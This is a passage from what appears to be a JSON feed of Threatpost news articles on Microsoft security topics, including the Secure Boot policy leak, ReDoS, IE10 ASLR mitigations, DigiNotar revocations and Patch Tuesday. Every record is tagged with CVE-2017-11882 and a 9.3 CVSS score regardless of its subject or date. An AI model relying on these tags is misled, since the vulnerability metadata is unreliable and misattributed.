2013 after it added its signature to its Malicious Software Removal Tool (MSRT) and cleaned all the infected machines it could find of ZeroAccess.\n", "cvss3": {}, "published": "2015-01-29T14:25:48", "type": "threatpost", "title": "ZeroAccess Returns, Resumes Click-Fraud Activity", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2015-02-03T14:05:27", "id": "THREATPOST:ABA04F8289071D7B10CAE4202D0EB18E", "href": "https://threatpost.com/zeroaccess-botnet-returns-resumes-click-fraud-activity/110736/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:54:56", "description": "**Update **Opponents of the government\u2019s constant talk about [intentional backdoors](<https://threatpost.com/harvard-paper-rebuts-going-dark/116095/>) and [exceptional access](<https://threatpost.com/crypto-leaders-exceptional-access-will-undo-security/113639/>) finally may have their case study as to why it\u2019s such a bad idea.\n\nTwo researchers operating under aliases ([my123](<https://twitter.com/never_released>) and [slipstream](<https://twitter.com/TheWack0lian>)) this week posted a [report](<https://rol.im/securegoldenkeyboot/>)\u2014accompanied by a relentless chiptune\u2014that reveals how Microsoft inadvertently published a Secure Boot policy that acts as a backdoor that allows for the UEFI firmware feature to be disabled and for anyone to load unsigned or self-signed code.\n\nThe gaffe, meant to be a legitimate debugging and testing feature, affects Windows-based devices with Secure Boot on by default; Secure Boot checks that any components loaded during boot are [digitally signed (by Microsoft) and verified](<https://blogs.technet.microsoft.com/dubaisec/2016/03/14/diving-into-secure-boot/>). As a result of the error, users can run self-signed binaries on affected devices or install non-Windows operating systems.\n\nWorse, the researchers said, is that it\u2019s unlikely Microsoft can clean up this mess. For two months running, Microsoft has published security bulletins on [Patch Tuesday](<https://threatpost.com/windows-pdf-library-flaw-puts-edge-users-at-risk-for-rce/119773/>) that includes updates to Secure Boot. Neither, according to my123 and slipstream, has fully addressed this issue.\n\n\u201cIt\u2019d be impossible in practise for MS to revoke every bootmgr earlier than a certain point, as they\u2019d break install media, recovery partitions, backups, etc,\u201d the researchers wrote in their report.\n\n~~Microsoft did not respond to a request for comment in time for publication.~~\n\n\u201cThe jailbreak technique described in the researchers\u2019 report on August 10 does not apply to desktop or enterprise PC systems. It requires physical access and administrator rights to ARM and RT devices and does not compromise encryption protections,\u201d_ _a Microsoft spokesperson told Threatpost via email.\n\nMicrosoft\u2019s first pass at fixing this in June, [MS16-094](<https://technet.microsoft.com/en-us/library/security/ms16-094.aspx>), blacklisted most, but not all of the relevant policies, the researchers said. An attacker would still be able to manipulate bootmgr, which manages boot sequences in Windows, in order to bypass Secure Boot. The second patch, released this week in [MS16-100](<https://technet.microsoft.com/en-us/library/security/ms16-100.aspx>), says it revokes bootmgrs, and updates the Secure Boot dbx, which includes the addition of new SHA256 hashes. The researchers, however, said this patch may not be complete as well.\n\n\u201cI checked the hash in the signature of several bootmgrs of several architectures against this list, and found no matches,\u201d slipstream said. \u201cSo either this revokes many \u2018obscure\u2019 bootmgrs and bootmgfws, or I\u2019m checking the wrong hash.\u201d\n\nWith the policy now available online, Windows devices, including Windows RT, HoloLens, Windows Phone, maybe Surface Hub, the researchers said, can have their versions of Secure Boot disabled.\n\n\u201cA backdoor, which MS put in to secure boot because they decided to not let the user turn it off in certain devices, allows for secure boot to be disabled everywhere! You can see the irony,\u201d the researchers wrote. \u201cAlso the irony in that MS themselves provided us several nice \u2018golden keys\u2019 (as the FBI would say) for us to use for that purpose :)\u201d\n\nThe irony is not lost on anyone who was watching the Apple-FBI saga from early this year during which the government asked Apple to create an intentionally weakened version of iOS that would disable or bypass existing protections on a terrorist\u2019s iPhone that would wipe the phone after x-number of missed passcode guesses.\n\nApple fought the FBI in court, challenging the constitutionality of the government\u2019s demand, which was eventually dropped after the FBI found an unnamed third-party who could crack the phone.\n\nThe Secure Boot report calls out the FBI specifically.\n\n\u201cAbout the FBI: are you reading this? If you are, then this is a perfect real world example about why your idea of backdooring cryptosystems with a \u2018secure golden key\u2019 is very bad!,\u201d the researchers wrote. \u201cSmarter people than me have been telling this to you for so long, it seems you have your fingers in your ears. You seriously don\u2019t understand still? Microsoft implemented a \u2018secure golden key\u2019 system. And the golden keys got released from MS own stupidity. Now, what happens if you tell everyone to make a \u201csecure golden key\u201d system? Hopefully you can add 2+2\u2026\u201d\n\n_This article was updated Aug. 11 with a comment from Microsoft. _\n", "cvss3": {}, "published": "2016-08-11T11:31:39", "type": "threatpost", "title": "Microsoft Mistakenly Leaks Secure Boot Key", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2016-08-16T11:52:46", "id": "THREATPOST:43EF6CEDCAE06DF2760527AA36C42994", "href": "https://threatpost.com/microsoft-mistakenly-leaks-secure-boot-key/119828/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:09:43", "description": "[](<https://threatpost.com/windows-wins-attacks-wild-081909/>)The \u201ccritical\u201d WINS vulnerability that Microsoft issued a patch for last week is now being exploited actively in the wild, [according to the SANS Institute](<http://isc.sans.org/diary.html?storyid=6976>) [sans.org].\n\nThe Internet Storm Center (ISC), which is operated by SANS, is receiving preliminary reports that hackers are targeting Microsoft\u2019s WINS service on Windows NT, 2000 and 2003 servers. [Read the full story](<http://www.cio.com/article/499904/Windows_WINS_Attacks_in_the_Wild?source=rss_security>) [networkworld.com]\n", "cvss3": {}, "published": "2009-08-19T14:44:56", "type": "threatpost", "title": "Windows WINS Attacks In The Wild", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:38:50", "id": "THREATPOST:65B7931A3E49BA24F11CA0CB09743AEA", "href": "https://threatpost.com/windows-wins-attacks-wild-081909/72957/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:00:03", "description": "[](<https://media.threatpost.com/wp-content/uploads/sites/103/2013/10/07040458/andrew_storms.jpg>)On Oct. 9, 2003, Microsoft announced its new security patching process that would end up being a catalyst for significant change in the information security community. Ten years ago, the program was announced with a press release that promised\n\n * \u201cImproved patch management processes, policies and technologies to help customers stay up to date and secure.\u201d\n * \u201cGlobal education programs to provide better guidance and tools for securing systems.\u201d\n\nWithin the [press release](<http://www.prnewswire.com/news-releases/microsoft-outlines-new-initiatives-in-ongoing-security-efforts-to-help-customers-72447792.html>), chief executive officer Steve Ballmer said: \u201cOur goal is simple: Get our customers secure and keep them secure. Our commitment is to protect our customers from the growing wave of criminal attacks.\u201d\n\nThose of us working in the security industry or with corporate information security responsibility saw this as a direct response from the famous [Trustworthy Computing memo](<http://www.microsoft.com/en-us/news/features/2012/jan12/gatesmemo.aspx>) penned by Bill Gates in January 2002. The signs were clear. Microsoft was faced with a serious dilemma. Its software was riddled with security holes that were having a direct negative effect on its customers\u2019 security, availability and privacy. In corporate IT, Microsoft had quickly gotten its own nickname of \u201cnecessary evil.\u201d IT managers were forced to use Microsoft software for its business features, but it came at the cost of serious security risks.\n\nWhether you have like or disdain for Microsoft, the new security initiatives started 10 years ago created a great wave of change in our information security industry.\n\nFor starters, Microsoft proved to the security community that communication is a key cornerstone to vendor relationships. No one likes to admit they have security problems. Microsoft took the leap of not only admitting it had a problem, but also committed to delivering ongoing communications to its customers and to all computing users. Microsoft started blogging about security issues and also embarked on serious outbound communication campaigns to educate users.\n\nMicrosoft showed that communication and relationships are a two-way street. The powerhouse eventually grew to an age where it embraced the same community of people who were responsible for finding and publicly releasing security holes in its software. Today public disclosure of serious Microsoft security holes is now the exception.\n\nAlso, resource planning is table stakes in the enterprise IT world. Being a cost center doesn\u2019t help much, but IT has traditionally been underfunded and underappreciated. What is an enterprise IT or security manager supposed to do when their primary software vendor springs on them a critical security patch with do-or-die consequences? Historically, and still the case today, a lot of ongoing projects get dropped to quickly reallocate resources to the moment\u2019s critical security patch. Living in a world of constant interruption is detrimental to morale completion of any planned projects.\n\nWith Microsoft\u2019s new consistent patch release timing, enterprise IT could depend on a schedule and allocate resources accordingly. The monthly patching cycle soon became better known as Patch Tuesday. Later in Microsoft\u2019s maturity model, it would introduce the advanced notification service. We know this today as the Thursday before Patch Tuesday, when we receive a high level snippet of what to expect the following week.\n\nMicrosoft also proved value with consistency in other ways. For example, Microsoft took the early bold step of defining its security criticality ratings and made the definitions public. Even Microsoft\u2019s security bulletin text format and sections were delivered in a consistent format that security professionals have come to rely upon. Security people like repeatable and dependable systems. Microsoft delivered just that.\n\nThree cheers to Patch Tuesday. It\u2019s the second Tuesday of each month that we both love and hate. Ten years ago, the Patch Tuesday initiatives created profound benefits to all Microsoft consumers by making it easier to keep systems patched and more secure. At the time, the idea seemed so foreign, but has since gained so much following that other vendors such as Cisco, Adobe and Oracle have followed suit. Spend just five minutes today and consider where you\u2019d be today without Microsoft taking the leap 10 years ago.\n\n_Andrew Storms is the Director of DevOps for CloudPassage.___\n", "cvss3": {}, "published": "2013-10-02T09:40:46", "type": "threatpost", "title": "A Decade of Microsoft Patch Tuesday Security Updates", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-10-07T15:44:02", "id": "THREATPOST:1327F2449E675DB6F1F90EDB766B1DC8", "href": "https://threatpost.com/take-time-to-reflect-as-microsoft-patch-tuesday-turns-10/102488/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:09:26", "description": "Microsoft has announced plans to give away free versions of its COFEE (Computer Online Forensic Evidence Extractor) utility to help law enforcement agencies in cyber-crime investigations. \n\nCOFEE uses digital forensic technologies to help investigators gather evidence of live computer activity at the scene of a crime, regardless of technical expertise. \n \nLaw enforcement agents with less than 10 minutes training can capture live evidence of illegal activity by inserting the COFEE USB device into a computer. \n\nThe evidence is then preserved for analysis, protecting it from being destroyed when the computer is turned off for moving. \n\nMicrosoft explains:\n\n> A common challenge of cybercrime investigations is the need to conduct forensic analysis on a computer before it is powered down and restarted. Live evidence, such as some active system processes and network data, is volatile and may be lost while a computer is turning off. This evidence may contain information that could assist in the investigation and prosecution of a crime. With COFEE, a front-line officer doesn\u2019t have to be a computer expert to capture this volatile information before turning off the computer on the scene for later analysis. An officer with minimal computer experience can be tutored to use a pre-configured COFEE device in less than 10 minutes. This enables him or her to take advantage of common digital forensics tools the experts use to gather important volatile evidence while doing little more than simply inserting a USB device into the computer.\n\n[Read the full announcement](<http://www.microsoft.com/presspass/press/2009/oct09/10-13cofeepr.mspx>) [microsoft.com] \n", "cvss3": {}, "published": "2009-10-19T18:59:24", "type": "threatpost", "title": "Free COFEE Helps Law Enforcement Forensics", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2018-08-15T14:24:46", "id": "THREATPOST:D587192A5DA9FB1680FF9D453F96B972", "href": "https://threatpost.com/free-cofee-helps-law-enforcement-forensics-101909/72343/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:58:07", "description": "Scott Charney, the head of Microsoft\u2019s Trustworthy Computing efforts, said that he was the one who decided it was time to [move the TwC group in a new direction](<https://threatpost.com/era-ends-with-break-up-of-trustworthy-computing-group-at-microsoft/108404>) and integrate the security functions more deeply into the company as a whole.\n\n\u201cI was the architect of these changes. This is not about the company\u2019s loss of focus or diminution of commitment. Rather, in my view, these changes are necessary if we are to advance the state of trust in computing,\u201d Charney, the corporate vice president of Trustworthy Computing at Microsoft, wrote in a blog post.\n\nThe Trustworthy Computing team was an outgrowth of the effort that Microsoft started in 2002 to build more secure software. Modest at first, the TwC group eventually grew into a large team of engineers, developers and executives and became one of the more influential groups in the company. Charney, a former Department of Justice lawyer who joined Microsoft just as the security push was getting off the ground in 2002, said that the move to disperse the TwC team into different groups and change the reporting structure would help the company react more quickly and be more efficient with security related decisions.\n\n\u201cBy consolidating work within the company, as well as altering some reporting structures, Microsoft will be able to make a number of trust-related decisions more quickly and execute plans with greater speed, whether the objective is to get innovations into the hands of our customers, improve our engineering systems, ensure compliance with legal or corporate policies, or engage with regulators around the world,\u201d Charney wrote in the [post](<http://blogs.microsoft.com/cybertrust/2014/09/22/looking-forward-trustworthy-computing/>).\n\nOne of the key functions of the TwC team over the years has been the development and implementation of the Security Development Lifecycle, the comprehensive development, engineering and deployment program that\u2019s meant to build security into the company\u2019s products from the beginning. Charney said that the SDL will remain the responsibility of the part of the TwC group that\u2019s moving to the Cloud and Enterprise Division.\n\n\u201cI will continue to lead the Trustworthy Computing team in our new home as part of the Cloud and Enterprise Division. Significantly, Trustworthy Computing will maintain our company-wide responsibility for centrally driven programs such as the Security Development Lifecycle (SDL) and Online Security Assurance (OSA). But this change will also allow us to embed ourselves more fully in the engineering division most responsible for the future of cloud and security, while increasing the impact of our critical work on privacy issues by integrating those functions directly into the appropriate engineering and legal policy organizations,\u201d Charney said.\n\nThe change to the TwC group became public last week as the company was in the process of laying off 2,100 employees as part of a series of internal changes.\n", "cvss3": {}, "published": "2014-09-23T08:53:50", "type": "threatpost", "title": "Charney on Trustworthy Computing: 'I Was the Architect of These Changes'", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2014-09-25T18:08:18", "id": "THREATPOST:04738138B50414CEACDB62EFA6D61789", "href": "https://threatpost.com/charney-on-trustworthy-computing-i-was-the-architect-of-these-changes/108455/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:06:49", "description": "[](<https://threatpost.com/microsoft-releases-new-regex-fuzzer-101310/>)Microsoft has released a new fuzzing tool designed specifically to find mistakes in regular expressions in application code that could be vulnerable to attack. The [SDL Regex Fuzzer](<https://www.microsoft.com/downloads/en/details.aspx?FamilyID=8737519c-52d3-4291-9034-caa71855451f>) identifies problematic lines that might cause an application to be susceptible to attacks that consume huge amounts of resources and cause denial-of-service conditions.\n\nThe new fuzzer is meant to be used specifically to find vulnerable regular expressions in application code that could lead to a special kind of attack known as a ReDoS. Microsoft officials say that as more and more applications are moved to cloud providers, attackers will begin to focus their attention on those applications in new and profitable ways.\n\n\u201cI\u2019ve [predicted](<http://msdn.microsoft.com/en-us/magazine/ff646973.aspx>) before that as cloud computing gains wider adoption, we\u2019ll start to see a significant increase in denial of service (DoS) attacks against those services. When you\u2019re paying for the processor time, bandwidth and storage that your applications use, attacks that explicitly target and consume those resources can get very expensive very quickly, not to mention the costs of downtime for legitimate users. Attackers will shift from pursuing elusive privilege elevation vulnerabilities to simply blackmailing SaaS providers: pay me $10,000 or I\u2019ll make your app consume $20,000 worth of server resources,\u201d Microsoft\u2019s Bryan Sullivan wrote in a blog post explaining the SDL Regex Fuzzer.\n\nAs Sullivan explains in an [article](<http://msdn.microsoft.com/en-us/magazine/ff646973.aspx>) on the problem from earlier this year, a small change to an input string can cause major problems for a regular expression engine.\n\n\u201cHere is where things get \u2018interesting\u2019 (as in horribly dangerous). \nInstead of just checking that the next character after 5 is not the end \nof the string, the engine treats the next character, 6, as a new capture \ngroup and starts rechecking from there. Once that route fails, it backs \nup to 1234 and then tries 56 as a separate capture group, then 5 and 6 \neach as separate capture groups. The end result is that the engine \nactually ends up evaluating 32 different paths,\u201d he wrote. \n\n\u201cIf we now add just \none more numeric character to the evaluation string, the engine will \nhave to evaluate 64 paths\u2014twice as many\u2014to determine that it\u2019s not a \nmatch. This is an exponential increase in the amount of work being \nperformed by the regex engine. An attacker could provide a relatively \nshort input string\u201430 characters or so\u2014and force the engine to process \nhundreds of millions of paths, tying it up for hours or days.\u201d\n\nThe new fuzzer is free to download.\n", "cvss3": {}, "published": "2010-10-13T18:08:57", "type": "threatpost", "title": "Microsoft Releases New Regex Fuzzer", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2018-08-15T10:20:31", "id": "THREATPOST:EF898143DB86CE46FFBDC81DCD8E79AA", "href": "https://threatpost.com/microsoft-releases-new-regex-fuzzer-101310/74571/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:03:26", "description": "Microsoft is looking into a potential security issue affecting its Xbox 360 video game console this week after a group of college students claimed they were able to extract the credit card information of a console\u2019s previous owner from the machine.\n\nAshley Podhradsky, Rob D\u2019Ovidio, and Cindy Casey of Drexel University and Pat Engebretson of Dakota State University reportedly bought a refurbished Xbox from a Microsoft-authorized reseller in 2011 and were able to access old files containing the credit card information of the device\u2019s first owner. Despite having its hard drive wiped and its factory settings previously reset, the console was cracked after the students installed a software \u201cmodding\u201d tool that allows Xbox owners to install applications that aren\u2019t sanctioned by Microsoft.\n\n\n\nMicrosoft called the hack unlikely in a [statement obtained by ZDNet](<http://www.zdnet.com/blog/security/microsoft-investigating-used-xbox-360-credit-card-hack/11260?tag=content;siu-container>) on Monday.\n\nJim Alkove, General Manager, Security of Microsoft\u2019s Interactive Entertainment Business division, claimed the company launched an investigation into the hack. Alkove asserted that Xbox 360 consoles are not designed to store credit card data, adding that it was unlikely any information was recovered in the fashion the hackers described.\n\n\u201cWhen Microsoft refurbishes used consoles we have processes in place to wipe the local hard drives of any other user data,\u201d Alkove said, \u201cwe can assure Xbox owners we take the privacy and security of their personal data very seriously.\u201d\n\nGawker\u2019s video game blog [Kotaku](<http://kotaku.com/5897461/hackers-can-steal-credit-card-information-from-your-old-xbox-experts-tell-us>) interviewed Podhradsky about the device\u2019s security late last week.\n\n\u201cMicrosoft does a great job of protecting their proprietary information,\u201d she told the site, \u201cbut they don\u2019t do a great job of protecting the user\u2019s data.\u201d\n\nWhile the security of Microsoft\u2019s gaming console ([Xbox Live phishing attempts](<https://threatpost.com/xbox-security-chief-says-account-hacks-linked-phishing-resale-schemes-102011/>), etc.) has been called into question before, this is one of the first reports that claim the console\u2019s physical hard drive may be at risk.\n\nNASA, whose hard drives arguably carry more sensitive information than an Xbox, [caught similar heat in 2010](<https://threatpost.com/audit-nasa-fails-properly-wipe-data-discarded-drives-120810/>) after it was found not adequately wiping, sanitizing and destroying its own hard drives.\n", "cvss3": {}, "published": "2012-04-03T21:13:12", "type": "threatpost", "title": "Microsoft to Investigate Alleged Xbox Credit Card Hack", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:32:31", "id": "THREATPOST:BDA1752A66AD0D3CF8AB59CFB7A8F472", "href": "https://threatpost.com/microsoft-investigate-alleged-xbox-credit-card-hack-040312/76392/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:58:37", "description": "Much like the Year of PKI that has never come to be, information sharing has been one of security\u2019s more infamous non-starters. While successful in heavily siloed environments such as financial services, enterprises industry-wide are hesitant to share threat and security data for fear of [losing a competitive edge](<http://threatpost.com/share-and-share-alike-not-quite/100916>) or exposing further vulnerabilities.\n\nMicrosoft hopes the latest tweak to its Microsoft Active Protections Program (MAPP) will calm the waters a bit and engage companies and industries to [share threat data](<http://threatpost.com/adequate-attack-data-and-threat-information-sharing-no-longer-luxury-111512/77221>) in an effort to stem the effects of targeted and persistent attacks and speed up incident response recovery.\n\nA private preview is scheduled to open this week for [Microsoft Interflow](<http://www.microsoft.com/interflow>), a distributed platform for information exchange that is built on open specifications such as the Structured Threat Information eXpression ([STIX](<https://stix.mitre.org/>)), the Trusted Automation eXchange of Indicator Information ([TAXII](<https://taxii.mitre.org/>)), and the Cyber Observable eXpression standards ([CybOX](<http://cybox.mitre.org/>)). Today\u2019s announcement comes 11 months after Microsoft expanded MAPP, its vendor partner [information-sharing program to include incident responders](<http://threatpost.com/microsoft-expands-mapp-program-to-incident-response-teams/101524>).\n\n\u201cWe realized when we were building [MAPP for IR] that we needed a better way to automate the exchange of information with partners,\u201d said Jerry Bryant, senior security strategic, Microsoft Security Response Center.\n\nInterflow is built in Microsoft\u2019s Azure cloud-based application hosting platform, and organizations can use its management console to subscribe to different threat feeds, build a community of trusted partners with whom to share data, and set trust levels on those relationships, Bryant said. A watchlist feature allows companies to filter the potential thousands of [indicators of attacks](<http://threatpost.com/defenders-still-chasing-adequate-threat-intelligence-sharing/102904>) and threats they may receive, and those indicators can be configured to feed directly into an intrusion detection system, firewall or endpoint protection system, Bryant said.\n\n\u201cThe system is designed for end-to-end automation. We have APIs that can be used to subscribe to and process feeds into endpoint protection. It\u2019s designed to integrate with investments you\u2019ve already made,\u201d Bryant said. \u201cIf you\u2019re using SIEM to do analysis, this, through a plug-in architecture, plugs into that console. You can use it also for additional sets of data or build sets of data that you can share back out with partners.\u201d\n\nWhile Interflow\u2019s extensibility allows for customization of the feeds it processes, it will arrive with a number of feeds provided by Microsoft as well, ranging from malicious URLs used in attack campaigns, to detection guidance that can help partners write signatures. Those companies will also have the option of sending telemetry data back to Microsoft based on hits against those signatures once they\u2019re deployed, Bryant said.\n\nInterflow is not the only sharing platform to support STIX and TAXII; Bryant said Interflow is meant to be complementary to many of those platforms, including established one-to-many systems such as those used by the Financial Services Information Sharing and Analysis Center ([FS-ISAC](<https://www.fsisac.com/>)).\n\n\u201cWe\u2019re making sure our system talks to theirs,\u201d Bryant said of ISACs. \u201cThey have valuable data sets for those communities and valuable information for us. We can send them indicators [of compromise] and they can send telemetry to us that improves our responses and drive decision-making for out-of-band patches, for example.\u201d\n\nTelemetry exchange is not required, however, Bryant said.\n\n\u201cCompanies will establish their own communities they want to share with. We want to be in their communities and we will make feeds available, but they don\u2019t\u2019 have to share back with us.\n\n\u201cWe talked to CISOs, and some don\u2019t like the idea of having to share their data back with a private organization. We don\u2019t require that; we just want to facilitate more sharing in the industry.\u201d\n\nBryant said anonymization and data sanitation capabilities are on the Interflow road map. For now, Microsoft has not set a general availability timeline for Interflow.\n\n\u201cPeople are getting more interested in sharing more of their own information. Obviously, there\u2019s a lot of hesitancy, but you can start out cautiously with Interflow and develop tight circles,\u201d Bryant said. \u201cThat\u2019s part of what we\u2019re trying to do is facilitate the next level of sharing and enable bidirectional sharing and connecting of systems. Our goal is to break down barriers and get more data flowing in the industry. Today, the way it works is not keeping up with threats.\u201d\n", "cvss3": {}, "published": "2014-06-23T09:03:23", "type": "threatpost", "title": "Microsoft Interflow Information-Sharing Platform Preview Open", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2014-06-24T13:04:01", "id": "THREATPOST:4AB3E2B46281B3DB5FFB51D8F16A11EC", "href": "https://threatpost.com/microsoft-to-preview-interflow-information-sharing-platform/106798/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:09:55", "description": "[From InfoWorld (Roger Grimes)](<http://www.infoworld.com/d/security-central/pigs-fly-microsoft-leads-in-security-200?page=0,0&source=IFWNLE_nlt_daily_2009-06-19>)\n\n[](<https://threatpost.com/microsoft-takes-lead-security-061909/>)Talk about a turnaround. It\u2019s always hard to recognize the larger, slow-moving paradigm shifts as they happen. But after a decade of bad press regarding its commitment to software security, Microsoft seems to have turned the tide. Redmond is getting consistent security accolades these days, often from the very critics who used to call it out. Many of the world\u2019s most knowledgeable security experts are urging their favorite software vendors to follow in the footsteps of Microsoft. Read the full story [[InfoWorld.com](<http://www.infoworld.com/d/security-central/pigs-fly-microsoft-leads-in-security-200?page=0,0&source=IFWNLE_nlt_daily_2009-06-19>)].\n", "cvss3": {}, "published": "2009-06-19T18:13:35", "type": "threatpost", "title": "Microsoft Takes the Lead in Security", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:38:58", "id": "THREATPOST:B450AFC35B78A62F536227C18B77CB4E", "href": "https://threatpost.com/microsoft-takes-lead-security-061909/72854/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:03:32", "description": "Windows 8 is still off on the horizon somewhere, but the new version of Internet Explorer that\u2019s coming with it\u2013IE 10\u2013already is in consumer preview and it includes some major changes to the exploit mitigations. In addition to the existing implementations of ASLR, DEP and others technologies in Windows and IE, Microsoft has included a couple of new ones designed to further inhibit memory attacks.\n\nThe biggest change in IE 10 is a technology called ForceASLR that\u2019s meant to help compensate for the fact that not every application on Windows is compiled with the flag that opts them into ASLR. One of the main exploit mitigations that Microsoft has added to Windows in recent years, ASLR (address space layout randomization) essentially turns memory modules into moving targets for attackers, making it far more difficult for them to locate their payloads where they want. This has made browser-based exploits more complicated, but it only works if developers compile their applications with a specific flag, called /DYNAMICBASE, set. \n\nThe new ForceASLR technology helps fix that shortcoming by allowing IE to tell Windows to load every module in a random location, regardless of whether it was compiled with the /DYNAMICBASE flag. Microsoft security officials say that this is among the more important additions the company has made to the security of its browser and Windows machines.\n\n\u201cForceASLR is arguably the most important change to ASLR in Windows 8. ForceASLR is a new loader option used by Internet Explorer 10 to instruct the operating system to randomize the location of _all_ modules loaded by the browser, even if a given module was not compiled with the /DYNAMICBASE flag. The ForceASLR protection was added to the Windows 8 kernel, and the feature is now available as an update to Windows 7 that will be installed when Internet Explorer 10 is installed on that platform,\u201d [Forbes Higman](<http://blogs.msdn.com/b/ie/archive/2012/03/12/enhanced-memory-protections-in-ie10.aspx?Redirected=true>), a security program manager on IE, wrote in a blog post.\n\nIn addition to ForceASLR, Microsoft has included another mitigation called High Entropy ASLR that takes advantage of the larger address space that\u2019s available on 64-bit Windows machines. The more entropy that the operating system can add to the randomization, the more difficult life will be for attackers who are trying to place their payloads precisely.\n\n\u201cThis has the effect of drastically increasing the number of potential addresses that may be assigned to a 64bit process. All 64bit processes can opt-in to the increased entropy made available by HEASLR. Processes can opt-in either at link time (/HIGHENTROPYVA) or at load time via a new Image File Execution Option,\u201d Higman said.\n\nSecurity researchers have been looking at the new protections in IE 10 and some have said that they are going to present a serious challenge for exploitation.\n\n\u201cIt will make exploitation much harder and more complicated,\u201d Chaouki Bekrar of VUPEN said at the CanSecWest conference last week when talking about the new mitigations.\n", "cvss3": {}, "published": "2012-03-13T19:08:41", "type": "threatpost", "title": "Microsoft Adds New Exploit Mitigations to IE 10", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:32:38", "id": "THREATPOST:7BE818C547990FA7A643DE9C0DE99C8C", "href": "https://threatpost.com/microsoft-adds-new-exploit-mitigations-ie-10-031312/76321/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:04:51", "description": "[](<https://threatpost.com/microsoft-releases-five-bulletins-september-patch-tuesday-091311/>)Microsoft on Tuesday released (again) the five security bulletins for its September Patch Tuesday. None of the fixes being released today is rated critical, with all five being rated important. Three of the bulletins fix flaws that could result in code execution.\n\nMicrosoft also updated the security bulletin it originally released a couple of weeks ago regarding the DigiNotar compromise, revoking trust for an additional six root certificates issued by the CA. The company removed trust for a number of certificates that were cross-signed by GTE and Entrust. Here is the list of certificates placed by Microsoft into the Untrusted Certificate Store:\n\n * DigiNotar Root CA\n * DigiNotar Root CA G2\n * DigiNotar PKIoverheid CA Overheid\n * DigiNotar PKIoverheid CA Organisatie \u2013 G2\n * DigiNotar PKIoverheid CA Overheid en Bedrijven\n * DigiNotar Root CA Issued by Entrust (2 certificates)*\n * DigiNotar Services 1024 CA Issued by Entrust*\n * Diginotar Cyber CA Issued by GTE CyberTrust (3 certificates)*\n\nThe five bulletins released by Microsoft on Tuesday include fixes for vulnerabilities in Windows, Office, Excel, Sharepoint and WINS. In an odd mistake, Microsoft on Friday accidentally made the link to the September bulletins live four days early. The page was only available for a short time before Microsoft removed it, but it was long enough for several sites to post the text of the advisories.\n", "cvss3": {}, "published": "2011-09-13T18:08:30", "type": "threatpost", "title": "Microsoft Releases Five Bulletins For September Patch Tuesday", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:33:47", "id": "THREATPOST:CC82779FBE47FD3E64708FE6233C3DAD", "href": "https://threatpost.com/microsoft-releases-five-bulletins-september-patch-tuesday-091311/75649/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-11-03T07:10:35", "description": "Phishing attempts more than doubled in 2018, as bad actors sought to trick victims into handing over their credentials. They used both old tricks \u2013 such as scams tied to current events \u2013 as well as other stealthy, fresher tactics.\n\nResearchers with Kaspersky Lab said in a [Tuesday report](<https://securelist.com/spam-and-phishing-in-2018/89701/>) that during the course of 2018, they detected phishing redirection attempts 482.5 million times \u2013 up from the 246.2 million attempts detected in 2017. In total, 18.32 percent of users were attacked, researchers said.\n\n\u201cWe have seen a steady increase in phishing attacks on cryptocurrency-related resources, and expect new scams to appear in 2019,\u201d according to the report, by Maria Vergelis, Tatyana Shcherbakova and Tatyana Sidorina with Kaspersky Lab. \u201cDespite the fall in value and the lean times for the cryptocurrency market as a whole, phishers and spammers will try to squeeze everything they can out of 